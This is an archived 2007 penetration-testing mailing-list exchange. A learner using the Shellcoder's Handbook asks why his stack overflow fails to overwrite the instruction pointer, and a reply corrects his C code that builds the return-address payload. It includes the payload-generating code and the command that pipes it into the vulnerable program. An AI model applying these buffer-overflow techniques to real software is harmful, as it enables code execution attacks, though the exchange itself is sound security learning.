Penetration Testing mailing list archives
Re: Controling the eip
From: Carl Livitt <carllivitt () yahoo com>
Date: Tue, 15 May 2007 17:01:06 +0100
You'll need to share the source of the vulnerable code as well as the code you already provided. I believe your code should look something more like this, too: #include <stdio.h> main() { int i=0; char stuffing[45]; // one more char allows you to null-terminate for (i=0; i<44; i+=4) // <= causes overflow, you need to use < *(long *) &stuffing[i] = 0x08048405; stuffing[44]='\0'; // remember to null-terminate puts(stuffing); } You'll notice that Cheers, Carl wymerzp () sbu edu wrote:
I am trying to learn about computer security. I picked up the book Shellcoder's Handbook (ISBN: 0-7645-4468-3)dump-perfect. When I inspect the stack with gdb it over-writes the eip with 0x41414141. I then look at the buffer size of the function as well as the address of said function (the purpose being to overflow the buffer, control eip to make the function iterate again) and the buffer size is 0x24 (36) and the address is 0x08048405. I then write a program to translate the hex into ASCII cleanly to insert into the buffer: #include <stdio.h> main() { int i=0; char stuffing[44]; for (i=0; i<=44; i+=4) { *(long *) &stuffing[i] = 0x08048405; puts(stuffing); } } I then run the program and input the address as ASCII into the buffer as follows: bash# (./addresstochar;cat) | ./overflow which doesn't make the program iterate twice and doesn't change eip on inspection of the stack. What am I doing wrong here? I tried to be as thorough as possible; please forgive my verbosity. Thanks, Zach ------------------------------------------------------------------------ This List Sponsored by: Cenzic Are you using SPI, Watchfire or WhiteHat? Consider getting clear vision with Cenzic See HOW Now with our 20/20 program! http://www.cenzic.com/c/2020 ------------------------------------------------------------------------
------------------------------------------------------------------------ This List Sponsored by: Cenzic Are you using SPI, Watchfire or WhiteHat? Consider getting clear vision with Cenzic See HOW Now with our 20/20 program! http://www.cenzic.com/c/2020 ------------------------------------------------------------------------
Current thread:
- Controling the eip wymerzp (May 15)
- Re: Controling the eip Carl Livitt (May 15)
- <Possible follow-ups>
- Re: Re: Controling the eip wymerzp (May 15)
- Sneaking a peek on Wlan in airports jasper . o . waale (May 16)
- 答复: Sneaking a peek on Wlan in airports Cony.Zhou (May 16)
- RE: Sneaking a peek on Wlan in airports Ricardo Landrau (May 16)
- RE: Sneaking a peek on Wlan in airports Shenk, Jerry A (May 16)
- Re: Sneaking a peek on Wlan in airports Jason Chambers (May 17)
- Re: Sneaking a peek on Wlan in airports crazy frog crazy frog (May 17)
- Re: Sneaking a peek on Wlan in airports Morning Wood (May 17)
- Sneaking a peek on Wlan in airports jasper . o . waale (May 16)
- Re: Sneaking a peek on Wlan in airports Colin Copley (May 16)
- Re: Sneaking a peek on Wlan in airports Chris Kuethe (May 16)